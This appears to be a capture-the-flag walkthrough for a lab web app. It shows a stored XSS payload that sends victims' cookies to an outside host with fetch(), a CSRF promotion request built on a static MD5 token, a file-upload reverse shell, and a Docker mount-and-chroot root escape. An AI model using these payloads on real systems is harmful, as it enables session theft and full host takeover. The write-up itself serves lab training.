Post

Sequence

Sequence

Sequence

Pasted image 20260620222009.png Pasted image 20260620230956.png Pasted image 20260620231004.png

🔍 Contact Form XSS

🕵️ Anyway, let’s explore the website a bit. I found a contact form and tried an XSS payload because it said: Thank you for your feedback! Someone from our team will review it shortly. And it worked! Pasted image 20260620221933.png Pasted image 20260620222122.png

💻 Let’s try to steal the cookies:

1
<script>fetch('http://192.168.131.95:8080/' + document.cookie)</script>

And I got them: Pasted image 20260620222240.png

I added the cookie to my browser: Pasted image 20260620222318.png and refreshed the page. Pasted image 20260620222330.png

As you can see, I got the first flag: Pasted image 20260620223057.png

💡 I explored the website further. There is a password change feature and a role modification option, but we cannot access it because we aren’t an admin. However, I noticed that the chat feature allows communication as admin. I tried XSS; while direct XSS was blocked, sending a link made the server access it: Pasted image 20260620223257.png

It turns out there is a client-side filter: Pasted image 20260620223348.png

Looking at the request, if we can send a request to the admin to change our role, we are good. Let’s see: Pasted image 20260620224920.png

I sent more requests and noticed that the CSRF token does not change. Let’s try to analyze the hash: Pasted image 20260620225427.png Let’s check this: Pasted image 20260620225539.png Let’s try this: Pasted image 20260620230012.png

We need to add the IP to our hosts file as suggested by the room description. The second payload worked:

1
 http://review.thm/promote_coadmin.php?username=mod&csrf_token_promote=21232f297a57a5a743894a0e4a801fc3

Pasted image 20260620230111.png

We can see the user table. I logged out and logged back in to get the flag. Since I had changed the password (or could log in using the cookie), we got access: Pasted image 20260620230237.png Pasted image 20260620231151.png

⚡ Internal Host Enumeration

Remember the text we found in the note:

1
Both features have been placed in a controlled environment to prevent unauthorized access. The Finance panel (`/finance.php`) is hosted on the internal 192.x network, and the Lottery panel (`/lottery.php`) resides on the same segment.

So, let’s try to access finance.php: Pasted image 20260620231416.png

I changed the value to finance.php and entered the password from the text file: Pasted image 20260620231615.png

🔑 Exploiting upload path & Docker Escalation

📌 After entering the password, we got this screen. Let’s try to get a reverse shell through it: Pasted image 20260620231821.png And we can see the upload path: Pasted image 20260620231929.png

Even though it says it is not showing, let’s try the same method of modifying the HTML to render it: Pasted image 20260620232028.png Yep, we got the reverse shell!

It is a container running Docker:

1
docker run -v /:/host -it phpvulnerable chroot /host bash

Pasted image 20260620233316.png And we got the root flag! Pasted image 20260620233335.png

This post is licensed under CC BY 4.0 by the author.